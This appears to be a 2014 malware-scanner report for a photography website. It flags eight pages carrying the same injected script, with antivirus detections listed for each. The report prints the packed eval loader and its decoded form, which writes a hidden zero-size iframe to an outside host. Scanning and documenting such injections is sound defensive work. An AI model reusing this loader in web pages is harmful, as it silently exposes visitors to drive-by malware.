
Malware Scanner report for leighannhoodphotography.com

Malicious/Suspicious/Total urls checked
8/0/20
8 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
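Malicious/Hidden/Total iFrames
0/0/0 (the zero-size iframe listed under "Decoded script" below is written by JavaScript at load time, so it is presumably not counted among the iframes found in the served HTML)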
Deface / Content modification
OK


Scanned pages/files

Request | Server response | Status
http://www.leighannhoodphotography.com/
200 OK
Content-Length: 16306
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('7 c="x+/=";7 1="z/B=";7 5="";7 j,k,e,d,a,8,b="";7 i=0;7 t=/[^A-q-p-9\\+\\/\\=]/g;1=1.D(/[^A-q-p-9\\+\\/\\=]/g,"");s{d=c.f(1.h(i++));a=c.f(1.h(i++));8=c.f(1.h(i++));
... 102 bytes are skipped ...
|b;5=5+l.m(j);n(8!=o){5=5+l.m(k)}n(b!=o){5=5+l.m(e)}j=k=e="";d=a=8=b=""}y(i<1.C);u.r(v(5));',40,40,'|s5fA||||P3yL||var|toUe||ZEPX|K0oj|k0e0y0S|aiJg|EqVD|indexOf||charAt||wzQl|DwS9|String|fromCharCode|if|64|z0|Za|write|do|base64test|document|unescape|15|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|while|PGlmcmFtZSBzcmM9Imh0dHA6Ly93b3ctZ2FtZWdvbGQuY29tL3Bob3Rvcy9nby5waHA||c2lkPTIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4|length|replace'.split('|'),0,{}))

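Decoded script (the packed eval(function(p,a,c,k,e,d){...}) wrapper above, unpacked; it Base64-decodes the string held in s5fA and passes the result to document.write, which emits the zero-size iframe shown on the last line; the same sample appears under every page flagged malicious in this report):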


var k0e0y0S="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var s5fA="PGlmcmFtZSBzcmM9Imh0dHA6Ly93b3ctZ2FtZWdvbGQuY29tL3Bob3Rvcy9nby5waHA/c2lkPTIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4=";var P3yL="";var wzQl,DwS9,EqVD,aiJg,ZEPX,toUe,K0oj="";var i=0;var base64test=/[^A-Za-z0-9\+\/\=]/g;s5fA=s5fA.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{aiJg=k0e0y0S.indexOf(s5fA.charAt(i++));ZEPX=k0e0y0S.indexOf(s5fA.charAt(i++));toUe=k0e0y0S.indexOf(s5fA.charAt(i++));
... 898 bytes are skipped ...
.indexOf(s5fA.charAt(i++));wzQl=(aiJg<<2)|(ZEPX>>4);DwS9=((ZEPX&15)<<4)|(toUe>>2);EqVD=((toUe&3)<<6)|K0oj;P3yL=P3yL+String.fromCharCode(wzQl);if(toUe!=64){P3yL=P3yL+String.fromCharCode(DwS9)}if(K0oj!=64){P3yL=P3yL+String.fromCharCode(EqVD)}wzQl=DwS9=EqVD="";aiJg=ZEPX=toUe=K0oj=""}while(i<s5fA.length);document.write(unescape(P3yL));
<iframe src="http://wow-gamegold.com/photos/go.php?sid=2" width="0" height="0" frameborder="0"></iframe>

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
HTML:Iframe-LX [Trj]
Ad-Aware
JS:Trojan.Crypt.JC
Ikarus
Trojan.IframeRef
nProtect
JS:Trojan.Crypt.JC
TrendMicro-HouseCall
TROJ_GEN.F47V0209
Emsisoft
JS:Trojan.Crypt.JC (B)
Microsoft
Exploit:HTML/IframeRef.AA
Kaspersky
Trojan.JS.Iframe.fa
MicroWorld-eScan
JS:Trojan.Crypt.JC
Fortinet
JS/Iframe.FA!tr
NANO-Antivirus
Trojan.Script.Agent.sbnf
F-Secure
JS:Trojan.Crypt.JC
Norman
IframeRef.DM
GData
JS:Trojan.Crypt.JC
BitDefender
JS:Trojan.Crypt.JC

http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js?ver=3.9.3
200 OK
Content-Length: 93868
Content-Type: text/javascript
clean
http://www.leighannhoodphotography.com/wp-content/themes/brandom-photography/js/libs/modernizr-2.5.3.min.js?ver=1.2.4
200 OK
Content-Length: 15274
Content-Type: application/javascript
clean
http://html5shim.googlecode.com/svn/trunk/html5.js?ver=1.2.4
200 OK
Content-Length: 2429
Content-Type: text/javascript
clean
http://www.leighannhoodphotography.com/wp-content/themes/brandom-photography/js/plugins.min.js?ver=1.2.4
200 OK
Content-Length: 29082
Content-Type: application/javascript
clean
http://www.leighannhoodphotography.com/wp-content/themes/brandom-photography/js/scripts.min.js?ver=1.2.4
200 OK
Content-Length: 5124
Content-Type: application/javascript
clean
http://assets.pinterest.com/js/pinit.js
200 OK
Content-Length: 319
Content-Type: application/javascript
clean
http://www.leighannhoodphotography.com/wp-includes/js/jquery/jquery.form.min.js?ver=3.37.0
200 OK
Content-Length: 14720
Content-Type: application/javascript
clean
http://www.leighannhoodphotography.com/about-me/
200 OK
Content-Length: 17399
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('7 c="x+/=";7 1="z/B=";7 5="";7 j,k,e,d,a,8,b="";7 i=0;7 t=/[^A-q-p-9\\+\\/\\=]/g;1=1.D(/[^A-q-p-9\\+\\/\\=]/g,"");s{d=c.f(1.h(i++));a=c.f(1.h(i++));8=c.f(1.h(i++));
... 102 bytes are skipped ...
|b;5=5+l.m(j);n(8!=o){5=5+l.m(k)}n(b!=o){5=5+l.m(e)}j=k=e="";d=a=8=b=""}y(i<1.C);u.r(v(5));',40,40,'|s5fA||||P3yL||var|toUe||ZEPX|K0oj|k0e0y0S|aiJg|EqVD|indexOf||charAt||wzQl|DwS9|String|fromCharCode|if|64|z0|Za|write|do|base64test|document|unescape|15|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|while|PGlmcmFtZSBzcmM9Imh0dHA6Ly93b3ctZ2FtZWdvbGQuY29tL3Bob3Rvcy9nby5waHA||c2lkPTIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4|length|replace'.split('|'),0,{}))

Decoded script:


var k0e0y0S="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var s5fA="PGlmcmFtZSBzcmM9Imh0dHA6Ly93b3ctZ2FtZWdvbGQuY29tL3Bob3Rvcy9nby5waHA/c2lkPTIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4=";var P3yL="";var wzQl,DwS9,EqVD,aiJg,ZEPX,toUe,K0oj="";var i=0;var base64test=/[^A-Za-z0-9\+\/\=]/g;s5fA=s5fA.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{aiJg=k0e0y0S.indexOf(s5fA.charAt(i++));ZEPX=k0e0y0S.indexOf(s5fA.charAt(i++));toUe=k0e0y0S.indexOf(s5fA.charAt(i++));
... 898 bytes are skipped ...
.indexOf(s5fA.charAt(i++));wzQl=(aiJg<<2)|(ZEPX>>4);DwS9=((ZEPX&15)<<4)|(toUe>>2);EqVD=((toUe&3)<<6)|K0oj;P3yL=P3yL+String.fromCharCode(wzQl);if(toUe!=64){P3yL=P3yL+String.fromCharCode(DwS9)}if(K0oj!=64){P3yL=P3yL+String.fromCharCode(EqVD)}wzQl=DwS9=EqVD="";aiJg=ZEPX=toUe=K0oj=""}while(i<s5fA.length);document.write(unescape(P3yL));
<iframe src="http://wow-gamegold.com/photos/go.php?sid=2" width="0" height="0" frameborder="0"></iframe>

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
HTML:Iframe-LX [Trj]
Ad-Aware
JS:Trojan.Crypt.JC
Ikarus
Trojan.IframeRef
nProtect
JS:Trojan.Crypt.JC
TrendMicro-HouseCall
TROJ_GEN.F47V0209
Emsisoft
JS:Trojan.Crypt.JC (B)
Microsoft
Exploit:HTML/IframeRef.AA
Kaspersky
Trojan.JS.Iframe.fa
MicroWorld-eScan
JS:Trojan.Crypt.JC
Fortinet
JS/Iframe.FA!tr
NANO-Antivirus
Trojan.Script.Agent.sbnf
F-Secure
JS:Trojan.Crypt.JC
Norman
IframeRef.DM
GData
JS:Trojan.Crypt.JC
BitDefender
JS:Trojan.Crypt.JC

http://www.leighannhoodphotography.com/gallery
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 18 Dec 2014 12:52:41 GMT
Location: http://www.leighannhoodphotography.com/gallery/
Server: nginx/1.6.2
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.leighannhoodphotography.com/xmlrpc.php
clean
http://www.leighannhoodphotography.com/gallery/
200 OK
Content-Length: 17306
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('7 c="x+/=";7 1="z/B=";7 5="";7 j,k,e,d,a,8,b="";7 i=0;7 t=/[^A-q-p-9\\+\\/\\=]/g;1=1.D(/[^A-q-p-9\\+\\/\\=]/g,"");s{d=c.f(1.h(i++));a=c.f(1.h(i++));8=c.f(1.h(i++));
... 102 bytes are skipped ...
|b;5=5+l.m(j);n(8!=o){5=5+l.m(k)}n(b!=o){5=5+l.m(e)}j=k=e="";d=a=8=b=""}y(i<1.C);u.r(v(5));',40,40,'|s5fA||||P3yL||var|toUe||ZEPX|K0oj|k0e0y0S|aiJg|EqVD|indexOf||charAt||wzQl|DwS9|String|fromCharCode|if|64|z0|Za|write|do|base64test|document|unescape|15|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|while|PGlmcmFtZSBzcmM9Imh0dHA6Ly93b3ctZ2FtZWdvbGQuY29tL3Bob3Rvcy9nby5waHA||c2lkPTIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4|length|replace'.split('|'),0,{}))

Decoded script:


var k0e0y0S="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var s5fA="PGlmcmFtZSBzcmM9Imh0dHA6Ly93b3ctZ2FtZWdvbGQuY29tL3Bob3Rvcy9nby5waHA/c2lkPTIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4=";var P3yL="";var wzQl,DwS9,EqVD,aiJg,ZEPX,toUe,K0oj="";var i=0;var base64test=/[^A-Za-z0-9\+\/\=]/g;s5fA=s5fA.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{aiJg=k0e0y0S.indexOf(s5fA.charAt(i++));ZEPX=k0e0y0S.indexOf(s5fA.charAt(i++));toUe=k0e0y0S.indexOf(s5fA.charAt(i++));
... 898 bytes are skipped ...
.indexOf(s5fA.charAt(i++));wzQl=(aiJg<<2)|(ZEPX>>4);DwS9=((ZEPX&15)<<4)|(toUe>>2);EqVD=((toUe&3)<<6)|K0oj;P3yL=P3yL+String.fromCharCode(wzQl);if(toUe!=64){P3yL=P3yL+String.fromCharCode(DwS9)}if(K0oj!=64){P3yL=P3yL+String.fromCharCode(EqVD)}wzQl=DwS9=EqVD="";aiJg=ZEPX=toUe=K0oj=""}while(i<s5fA.length);document.write(unescape(P3yL));
<iframe src="http://wow-gamegold.com/photos/go.php?sid=2" width="0" height="0" frameborder="0"></iframe>

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
HTML:Iframe-LX [Trj]
Ad-Aware
JS:Trojan.Crypt.JC
Ikarus
Trojan.IframeRef
nProtect
JS:Trojan.Crypt.JC
TrendMicro-HouseCall
TROJ_GEN.F47V0209
Emsisoft
JS:Trojan.Crypt.JC (B)
Microsoft
Exploit:HTML/IframeRef.AA
Kaspersky
Trojan.JS.Iframe.fa
MicroWorld-eScan
JS:Trojan.Crypt.JC
Fortinet
JS/Iframe.FA!tr
NANO-Antivirus
Trojan.Script.Agent.sbnf
F-Secure
JS:Trojan.Crypt.JC
Norman
IframeRef.DM
GData
JS:Trojan.Crypt.JC
BitDefender
JS:Trojan.Crypt.JC

http://www.leighannhoodphotography.com/gallery/bridal
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 18 Dec 2014 12:52:43 GMT
Location: http://www.leighannhoodphotography.com/gallery/bridal/
Server: nginx/1.6.2
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.leighannhoodphotography.com/xmlrpc.php
clean
http://www.leighannhoodphotography.com/gallery/bridal/
200 OK
Content-Length: 16356
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('7 c="x+/=";7 1="z/B=";7 5="";7 j,k,e,d,a,8,b="";7 i=0;7 t=/[^A-q-p-9\\+\\/\\=]/g;1=1.D(/[^A-q-p-9\\+\\/\\=]/g,"");s{d=c.f(1.h(i++));a=c.f(1.h(i++));8=c.f(1.h(i++));
... 102 bytes are skipped ...
|b;5=5+l.m(j);n(8!=o){5=5+l.m(k)}n(b!=o){5=5+l.m(e)}j=k=e="";d=a=8=b=""}y(i<1.C);u.r(v(5));',40,40,'|s5fA||||P3yL||var|toUe||ZEPX|K0oj|k0e0y0S|aiJg|EqVD|indexOf||charAt||wzQl|DwS9|String|fromCharCode|if|64|z0|Za|write|do|base64test|document|unescape|15|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|while|PGlmcmFtZSBzcmM9Imh0dHA6Ly93b3ctZ2FtZWdvbGQuY29tL3Bob3Rvcy9nby5waHA||c2lkPTIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4|length|replace'.split('|'),0,{}))

Decoded script:


var k0e0y0S="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var s5fA="PGlmcmFtZSBzcmM9Imh0dHA6Ly93b3ctZ2FtZWdvbGQuY29tL3Bob3Rvcy9nby5waHA/c2lkPTIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4=";var P3yL="";var wzQl,DwS9,EqVD,aiJg,ZEPX,toUe,K0oj="";var i=0;var base64test=/[^A-Za-z0-9\+\/\=]/g;s5fA=s5fA.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{aiJg=k0e0y0S.indexOf(s5fA.charAt(i++));ZEPX=k0e0y0S.indexOf(s5fA.charAt(i++));toUe=k0e0y0S.indexOf(s5fA.charAt(i++));
... 898 bytes are skipped ...
.indexOf(s5fA.charAt(i++));wzQl=(aiJg<<2)|(ZEPX>>4);DwS9=((ZEPX&15)<<4)|(toUe>>2);EqVD=((toUe&3)<<6)|K0oj;P3yL=P3yL+String.fromCharCode(wzQl);if(toUe!=64){P3yL=P3yL+String.fromCharCode(DwS9)}if(K0oj!=64){P3yL=P3yL+String.fromCharCode(EqVD)}wzQl=DwS9=EqVD="";aiJg=ZEPX=toUe=K0oj=""}while(i<s5fA.length);document.write(unescape(P3yL));
<iframe src="http://wow-gamegold.com/photos/go.php?sid=2" width="0" height="0" frameborder="0"></iframe>

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
HTML:Iframe-LX [Trj]
Ad-Aware
JS:Trojan.Crypt.JC
Ikarus
Trojan.IframeRef
nProtect
JS:Trojan.Crypt.JC
TrendMicro-HouseCall
TROJ_GEN.F47V0209
Emsisoft
JS:Trojan.Crypt.JC (B)
Microsoft
Exploit:HTML/IframeRef.AA
Kaspersky
Trojan.JS.Iframe.fa
MicroWorld-eScan
JS:Trojan.Crypt.JC
Fortinet
JS/Iframe.FA!tr
NANO-Antivirus
Trojan.Script.Agent.sbnf
F-Secure
JS:Trojan.Crypt.JC
Norman
IframeRef.DM
GData
JS:Trojan.Crypt.JC
BitDefender
JS:Trojan.Crypt.JC

http://www.leighannhoodphotography.com/gallery/couples/
200 OK
Content-Length: 16114
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('7 c="x+/=";7 1="z/B=";7 5="";7 j,k,e,d,a,8,b="";7 i=0;7 t=/[^A-q-p-9\\+\\/\\=]/g;1=1.D(/[^A-q-p-9\\+\\/\\=]/g,"");s{d=c.f(1.h(i++));a=c.f(1.h(i++));8=c.f(1.h(i++));
... 102 bytes are skipped ...
|b;5=5+l.m(j);n(8!=o){5=5+l.m(k)}n(b!=o){5=5+l.m(e)}j=k=e="";d=a=8=b=""}y(i<1.C);u.r(v(5));',40,40,'|s5fA||||P3yL||var|toUe||ZEPX|K0oj|k0e0y0S|aiJg|EqVD|indexOf||charAt||wzQl|DwS9|String|fromCharCode|if|64|z0|Za|write|do|base64test|document|unescape|15|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|while|PGlmcmFtZSBzcmM9Imh0dHA6Ly93b3ctZ2FtZWdvbGQuY29tL3Bob3Rvcy9nby5waHA||c2lkPTIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4|length|replace'.split('|'),0,{}))

Decoded script:


var k0e0y0S="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var s5fA="PGlmcmFtZSBzcmM9Imh0dHA6Ly93b3ctZ2FtZWdvbGQuY29tL3Bob3Rvcy9nby5waHA/c2lkPTIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4=";var P3yL="";var wzQl,DwS9,EqVD,aiJg,ZEPX,toUe,K0oj="";var i=0;var base64test=/[^A-Za-z0-9\+\/\=]/g;s5fA=s5fA.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{aiJg=k0e0y0S.indexOf(s5fA.charAt(i++));ZEPX=k0e0y0S.indexOf(s5fA.charAt(i++));toUe=k0e0y0S.indexOf(s5fA.charAt(i++));
... 898 bytes are skipped ...
.indexOf(s5fA.charAt(i++));wzQl=(aiJg<<2)|(ZEPX>>4);DwS9=((ZEPX&15)<<4)|(toUe>>2);EqVD=((toUe&3)<<6)|K0oj;P3yL=P3yL+String.fromCharCode(wzQl);if(toUe!=64){P3yL=P3yL+String.fromCharCode(DwS9)}if(K0oj!=64){P3yL=P3yL+String.fromCharCode(EqVD)}wzQl=DwS9=EqVD="";aiJg=ZEPX=toUe=K0oj=""}while(i<s5fA.length);document.write(unescape(P3yL));
<iframe src="http://wow-gamegold.com/photos/go.php?sid=2" width="0" height="0" frameborder="0"></iframe>

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
HTML:Iframe-LX [Trj]
Ad-Aware
JS:Trojan.Crypt.JC
Ikarus
Trojan.IframeRef
nProtect
JS:Trojan.Crypt.JC
TrendMicro-HouseCall
TROJ_GEN.F47V0209
Emsisoft
JS:Trojan.Crypt.JC (B)
Microsoft
Exploit:HTML/IframeRef.AA
Kaspersky
Trojan.JS.Iframe.fa
MicroWorld-eScan
JS:Trojan.Crypt.JC
Fortinet
JS/Iframe.FA!tr
NANO-Antivirus
Trojan.Script.Agent.sbnf
F-Secure
JS:Trojan.Crypt.JC
Norman
IframeRef.DM
GData
JS:Trojan.Crypt.JC
BitDefender
JS:Trojan.Crypt.JC

http://www.leighannhoodphotography.com/gallery/engagement
HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache, must-revalidate, max-age=0
Connection: close
Date: Thu, 18 Dec 2014 12:52:47 GMT
Pragma: no-cache
Location: http://www.leighannhoodphotography.com/gallery/engagements/
Server: nginx/1.6.2
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
X-Pingback: http://www.leighannhoodphotography.com/xmlrpc.php
clean
http://www.leighannhoodphotography.com/gallery/engagements/
200 OK
Content-Length: 30788
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('7 c="x+/=";7 1="z/B=";7 5="";7 j,k,e,d,a,8,b="";7 i=0;7 t=/[^A-q-p-9\\+\\/\\=]/g;1=1.D(/[^A-q-p-9\\+\\/\\=]/g,"");s{d=c.f(1.h(i++));a=c.f(1.h(i++));8=c.f(1.h(i++));
... 102 bytes are skipped ...
|b;5=5+l.m(j);n(8!=o){5=5+l.m(k)}n(b!=o){5=5+l.m(e)}j=k=e="";d=a=8=b=""}y(i<1.C);u.r(v(5));',40,40,'|s5fA||||P3yL||var|toUe||ZEPX|K0oj|k0e0y0S|aiJg|EqVD|indexOf||charAt||wzQl|DwS9|String|fromCharCode|if|64|z0|Za|write|do|base64test|document|unescape|15|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|while|PGlmcmFtZSBzcmM9Imh0dHA6Ly93b3ctZ2FtZWdvbGQuY29tL3Bob3Rvcy9nby5waHA||c2lkPTIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4|length|replace'.split('|'),0,{}))

Decoded script:


var k0e0y0S="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var s5fA="PGlmcmFtZSBzcmM9Imh0dHA6Ly93b3ctZ2FtZWdvbGQuY29tL3Bob3Rvcy9nby5waHA/c2lkPTIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4=";var P3yL="";var wzQl,DwS9,EqVD,aiJg,ZEPX,toUe,K0oj="";var i=0;var base64test=/[^A-Za-z0-9\+\/\=]/g;s5fA=s5fA.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{aiJg=k0e0y0S.indexOf(s5fA.charAt(i++));ZEPX=k0e0y0S.indexOf(s5fA.charAt(i++));toUe=k0e0y0S.indexOf(s5fA.charAt(i++));
... 898 bytes are skipped ...
.indexOf(s5fA.charAt(i++));wzQl=(aiJg<<2)|(ZEPX>>4);DwS9=((ZEPX&15)<<4)|(toUe>>2);EqVD=((toUe&3)<<6)|K0oj;P3yL=P3yL+String.fromCharCode(wzQl);if(toUe!=64){P3yL=P3yL+String.fromCharCode(DwS9)}if(K0oj!=64){P3yL=P3yL+String.fromCharCode(EqVD)}wzQl=DwS9=EqVD="";aiJg=ZEPX=toUe=K0oj=""}while(i<s5fA.length);document.write(unescape(P3yL));
<iframe src="http://wow-gamegold.com/photos/go.php?sid=2" width="0" height="0" frameborder="0"></iframe>

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
HTML:Iframe-LX [Trj]
Ad-Aware
JS:Trojan.Crypt.JC
Ikarus
Trojan.IframeRef
nProtect
JS:Trojan.Crypt.JC
TrendMicro-HouseCall
TROJ_GEN.F47V0209
Emsisoft
JS:Trojan.Crypt.JC (B)
Microsoft
Exploit:HTML/IframeRef.AA
Kaspersky
Trojan.JS.Iframe.fa
MicroWorld-eScan
JS:Trojan.Crypt.JC
Fortinet
JS/Iframe.FA!tr
NANO-Antivirus
Trojan.Script.Agent.sbnf
F-Secure
JS:Trojan.Crypt.JC
Norman
IframeRef.DM
GData
JS:Trojan.Crypt.JC
BitDefender
JS:Trojan.Crypt.JC

http://www.leighannhoodphotography.com/gallery/families
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 18 Dec 2014 12:52:49 GMT
Location: http://www.leighannhoodphotography.com/gallery/families/
Server: nginx/1.6.2
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.leighannhoodphotography.com/xmlrpc.php
clean
http://www.leighannhoodphotography.com/gallery/families/
200 OK
Content-Length: 34975
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('7 c="x+/=";7 1="z/B=";7 5="";7 j,k,e,d,a,8,b="";7 i=0;7 t=/[^A-q-p-9\\+\\/\\=]/g;1=1.D(/[^A-q-p-9\\+\\/\\=]/g,"");s{d=c.f(1.h(i++));a=c.f(1.h(i++));8=c.f(1.h(i++));
... 102 bytes are skipped ...
|b;5=5+l.m(j);n(8!=o){5=5+l.m(k)}n(b!=o){5=5+l.m(e)}j=k=e="";d=a=8=b=""}y(i<1.C);u.r(v(5));',40,40,'|s5fA||||P3yL||var|toUe||ZEPX|K0oj|k0e0y0S|aiJg|EqVD|indexOf||charAt||wzQl|DwS9|String|fromCharCode|if|64|z0|Za|write|do|base64test|document|unescape|15|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|while|PGlmcmFtZSBzcmM9Imh0dHA6Ly93b3ctZ2FtZWdvbGQuY29tL3Bob3Rvcy9nby5waHA||c2lkPTIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4|length|replace'.split('|'),0,{}))

Decoded script:


var k0e0y0S="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var s5fA="PGlmcmFtZSBzcmM9Imh0dHA6Ly93b3ctZ2FtZWdvbGQuY29tL3Bob3Rvcy9nby5waHA/c2lkPTIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4=";var P3yL="";var wzQl,DwS9,EqVD,aiJg,ZEPX,toUe,K0oj="";var i=0;var base64test=/[^A-Za-z0-9\+\/\=]/g;s5fA=s5fA.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{aiJg=k0e0y0S.indexOf(s5fA.charAt(i++));ZEPX=k0e0y0S.indexOf(s5fA.charAt(i++));toUe=k0e0y0S.indexOf(s5fA.charAt(i++));
... 898 bytes are skipped ...
.indexOf(s5fA.charAt(i++));wzQl=(aiJg<<2)|(ZEPX>>4);DwS9=((ZEPX&15)<<4)|(toUe>>2);EqVD=((toUe&3)<<6)|K0oj;P3yL=P3yL+String.fromCharCode(wzQl);if(toUe!=64){P3yL=P3yL+String.fromCharCode(DwS9)}if(K0oj!=64){P3yL=P3yL+String.fromCharCode(EqVD)}wzQl=DwS9=EqVD="";aiJg=ZEPX=toUe=K0oj=""}while(i<s5fA.length);document.write(unescape(P3yL));
<iframe src="http://wow-gamegold.com/photos/go.php?sid=2" width="0" height="0" frameborder="0"></iframe>

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
HTML:Iframe-LX [Trj]
Ad-Aware
JS:Trojan.Crypt.JC
Ikarus
Trojan.IframeRef
nProtect
JS:Trojan.Crypt.JC
TrendMicro-HouseCall
TROJ_GEN.F47V0209
Emsisoft
JS:Trojan.Crypt.JC (B)
Microsoft
Exploit:HTML/IframeRef.AA
Kaspersky
Trojan.JS.Iframe.fa
MicroWorld-eScan
JS:Trojan.Crypt.JC
Fortinet
JS/Iframe.FA!tr
NANO-Antivirus
Trojan.Script.Agent.sbnf
F-Secure
JS:Trojan.Crypt.JC
Norman
IframeRef.DM
GData
JS:Trojan.Crypt.JC
